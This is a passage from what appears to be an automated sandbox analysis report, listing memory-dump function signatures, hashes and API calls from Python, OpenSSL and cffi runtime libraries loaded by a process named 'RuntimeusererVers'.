                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Module_Object_State$Arg_D_flagsDigestInit_exKeywordsPy_hashtable_getTrueUnpackX_new
                                                                                                                                                                                                                                          • String ID: sha3_384
                                                                                                                                                                                                                                          • API String ID: 3901364687-1508202818
                                                                                                                                                                                                                                          • Opcode ID: 51943aaa8ffb0ef55caaa197f3d4a627a0819941559e3609ee30db2ba81ea600
                                                                                                                                                                                                                                          • Instruction ID: ea7013076186d87c8115984485b908a0ec27ffd1955764269639cfe091b3012f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51943aaa8ffb0ef55caaa197f3d4a627a0819941559e3609ee30db2ba81ea600
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7121B032A08F4381EE61CB11E804AA9A2A4FB48BE4F184634EE4D43744DF7DF9918700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • PyObject_IsTrue.PYTHON311 ref: 00007FF81E4E312B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: PyModule_GetState.PYTHON311 ref: 00007FF81E4E1063
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: _Py_hashtable_get.PYTHON311 ref: 00007FF81E4E1073
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: EVP_MD_flags.LIBCRYPTO-1_1 ref: 00007FF81E4E10A7
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: PyModule_GetState.PYTHON311 ref: 00007FF81E4E10B8
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: _PyObject_New.PYTHON311 ref: 00007FF81E4E10C1
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: EVP_MD_CTX_new.LIBCRYPTO-1_1 ref: 00007FF81E4E10D3
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 00007FF81E4E10FB
                                                                                                                                                                                                                                          • _PyArg_UnpackKeywords.PYTHON311 ref: 00007FF81E4E317B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Module_Object_State$Arg_D_flagsDigestInit_exKeywordsPy_hashtable_getTrueUnpackX_new
                                                                                                                                                                                                                                          • String ID: sha3_512
                                                                                                                                                                                                                                          • API String ID: 3901364687-1707686796
                                                                                                                                                                                                                                          • Opcode ID: 0a8ad529604d7f918e11f05739dc7f04c269867ef0bdf0d05e4a6f0ab303599f
                                                                                                                                                                                                                                          • Instruction ID: 887f8b162378c6328dfdd452b61d5327299ccdb0982f1b2470fff7c8f6a00e37
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a8ad529604d7f918e11f05739dc7f04c269867ef0bdf0d05e4a6f0ab303599f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE21B032B08F5381EE61CB12E444AAAA2A4FB48BE4F194235DE4D43749DF3DF9908700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                          • API String ID: 1767461275-1080266419
                                                                                                                                                                                                                                          • Opcode ID: 653bc97def7ddd28f1a173005cbf812f26c3eea3de9f75b4993d309b3b478db1
                                                                                                                                                                                                                                          • Instruction ID: 9621f63da520a93c0336dc7aa8ea2a0b9a29ebac7653002fc10db04252649926
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 653bc97def7ddd28f1a173005cbf812f26c3eea3de9f75b4993d309b3b478db1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE117939E19E4A86FB609BA0E4017BA23D5BF843A0F454235E90C827D9EF3CF6918610
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Arg_FreeMem_Parse_Size
                                                                                                                                                                                                                                          • String ID: ascii
                                                                                                                                                                                                                                          • API String ID: 2971325497-3510295289
                                                                                                                                                                                                                                          • Opcode ID: afca6dd8bfc955c7ed0e60d353618553c28b0435e58fec6b90a0733afdd1515c
                                                                                                                                                                                                                                          • Instruction ID: be1de5a615d0889ffcc74c0e84cf8103f8f7c820fcb6acfc87a2985cd7e56537
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afca6dd8bfc955c7ed0e60d353618553c28b0435e58fec6b90a0733afdd1515c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE11D736618F8585EB10CF16E84016AB7A4FB89BE5F584236EF8D83B24DF38E551CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$OccurredString
                                                                                                                                                                                                                                          • String ID: 'del x[n]' not supported for cdata objects
                                                                                                                                                                                                                                          • API String ID: 114435612-201749645
                                                                                                                                                                                                                                          • Opcode ID: 51569ec8dff97704305aa2c744b49f6cc6b6a5d3bd267e18ea5b64da064dbc22
                                                                                                                                                                                                                                          • Instruction ID: b506c854a544eda8e1a269455909c87e6885fce762504d61e36b2c17c560dd5e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51569ec8dff97704305aa2c744b49f6cc6b6a5d3bd267e18ea5b64da064dbc22
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2016D31B19E81C1EE588B16E9901B96360FB88BE8F581631EF5E07B99DF6CF4918700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_FormatObject_
                                                                                                                                                                                                                                          • String ID: cdata '%s' does not support iteration
                                                                                                                                                                                                                                          • API String ID: 2473357163-1739368148
                                                                                                                                                                                                                                          • Opcode ID: 6df2a41c6c5e8ccee29f1abfbddde22a7555a9e3a27c3adad32cb6348bcd6ae5
                                                                                                                                                                                                                                          • Instruction ID: 92e8b863fa793c8fdcb1391eceb5090693c64a45eb8585e89ca2c56b6b59b50e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6df2a41c6c5e8ccee29f1abfbddde22a7555a9e3a27c3adad32cb6348bcd6ae5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73012DB6A04F45C2EF19CF56E8A01A823A0FB98FE8B041636CE1D47365DF38E4A5C350
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_errorY_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_rsa.c
                                                                                                                                                                                                                                          • API String ID: 3485142574-2723262194
                                                                                                                                                                                                                                          • Opcode ID: a8b50999a1deb4f36001f735a94d71a96bf2baf49509506769d5e8e0f44de373
                                                                                                                                                                                                                                          • Instruction ID: a3d0511c4abb4bdd0849e1d37f3b1c2a834304a36f36edf40dffee235c9ad8fd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8b50999a1deb4f36001f735a94d71a96bf2baf49509506769d5e8e0f44de373
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4018625B08A8586EB40DB65F5445BEA391FF88BD4F444131FA8C47B96DF3CF9518A04
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                          • API String ID: 1767461275-1080266419
                                                                                                                                                                                                                                          • Opcode ID: a3402959f9b8482732006edcbc1b967c4b4a5d664d34c2b69162fbf4fa25a2fd
                                                                                                                                                                                                                                          • Instruction ID: 83e8ca21174b123bad0ab16afcfd04dc1a2ca2b330f140104fa38874a70b7693
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3402959f9b8482732006edcbc1b967c4b4a5d664d34c2b69162fbf4fa25a2fd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A017172F08A4986FB609B55C4057A927A1FB84794F508234EA4C477E1CF7EE5D6CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                          • API String ID: 1767461275-1080266419
                                                                                                                                                                                                                                          • Opcode ID: 313acef978bffea86714e02ae65a3a584ea264f2087be210df51fc1ee6c682e6
                                                                                                                                                                                                                                          • Instruction ID: e2cde2b31d26a5e623d82c2b657c155586306e9f3379d2a87c5768c04e3a3b30
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 313acef978bffea86714e02ae65a3a584ea264f2087be210df51fc1ee6c682e6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7017172E08A45C6FB609B54D4057E927A0FB40798F908234EA4C877E5CF7DE58ACB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _PyObject_GC_NewVar.PYTHON311 ref: 00007FF81E5097D2
                                                                                                                                                                                                                                          • PyObject_GC_Track.PYTHON311 ref: 00007FF81E5097F5
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E509010: PyBytes_FromStringAndSize.PYTHON311(?,?,00000058,00007FF81E50971F), ref: 00007FF81E509036
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E509010: memcpy.VCRUNTIME140(?,?,00000058,00007FF81E50971F), ref: 00007FF81E50904E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E509010: PyDict_GetItem.PYTHON311(?,?,00000058,00007FF81E50971F), ref: 00007FF81E50905D
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E509010: _Py_Dealloc.PYTHON311(?,?,00000058,00007FF81E50971F), ref: 00007FF81E509074
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E509010: _Py_Dealloc.PYTHON311(?,?,00000058,00007FF81E50971F), ref: 00007FF81E509086
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocObject_$Bytes_Dict_FromItemSizeStringTrackmemcpy
                                                                                                                                                                                                                                          • String ID: void
                                                                                                                                                                                                                                          • API String ID: 2546078241-3531332078
                                                                                                                                                                                                                                          • Opcode ID: 0863fdd0a118d905f249a4a06af98a6328a46230678528f4d36bec51dc1ff461
                                                                                                                                                                                                                                          • Instruction ID: 095ad5a02b8a4310ebb024a84dc0c10a79c257adf7e9e04eaadc6ae70b50b3a6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0863fdd0a118d905f249a4a06af98a6328a46230678528f4d36bec51dc1ff461
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD010071A15F8286E758CF25ECA016837A5FB48BA4F540334DA6D46398DF3DE594C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • the type '%s%s' is a function type, not a pointer-to-function type, xrefs: 00007FF81E515064
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocErr_Format
                                                                                                                                                                                                                                          • String ID: the type '%s%s' is a function type, not a pointer-to-function type
                                                                                                                                                                                                                                          • API String ID: 186121651-1909832095
                                                                                                                                                                                                                                          • Opcode ID: cab67f9ccf1dba178936e17a96365edc5cd616152bbfae97a22735237d3b5561
                                                                                                                                                                                                                                          • Instruction ID: 5ca96d3a9fec95cb5fa0cb30c1268af80a367d51a09616eb3e4276cafab17e5a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cab67f9ccf1dba178936e17a96365edc5cd616152bbfae97a22735237d3b5561
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91014F21A19E82C1EB44CB65E9A52AC23A1FF48BE8F894135CA0D06755DF3DF199C350
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: write_raw_complex_data$write_raw_complex_data: bad complex size
                                                                                                                                                                                                                                          • API String ID: 0-1904489683
                                                                                                                                                                                                                                          • Opcode ID: bdbef72195195b3290edd819941f0765dc9b9e0b6035cda4fd1bb299dd4dd6cb
                                                                                                                                                                                                                                          • Instruction ID: 7d9756a7be5e17ee21eada6f076742b35aa68076591a29a182275705b45ead78
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bdbef72195195b3290edd819941f0765dc9b9e0b6035cda4fd1bb299dd4dd6cb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35015E72915F89CAD611CF68D85005AF3A0FB9ABA5F108722E64C16624DFACE092CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Y_get0_group
                                                                                                                                                                                                                                          • String ID: {
                                                                                                                                                                                                                                          • API String ID: 3268241200-4087598719
                                                                                                                                                                                                                                          • Opcode ID: e33d06e3be94e0a184dbb4d4c60d0bab2df72c9bf962c9d4d93606db3ef6c6e7
                                                                                                                                                                                                                                          • Instruction ID: 35bfa69335e08c6d5269fbb0fe65c60a83c47437fe739137a336dc3bfa7ec648
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e33d06e3be94e0a184dbb4d4c60d0bab2df72c9bf962c9d4d93606db3ef6c6e7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82F08CB1A0DE42C5FE219E90F8006B96790BB807F4F440732DA8D47695DF6DF546CB10
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
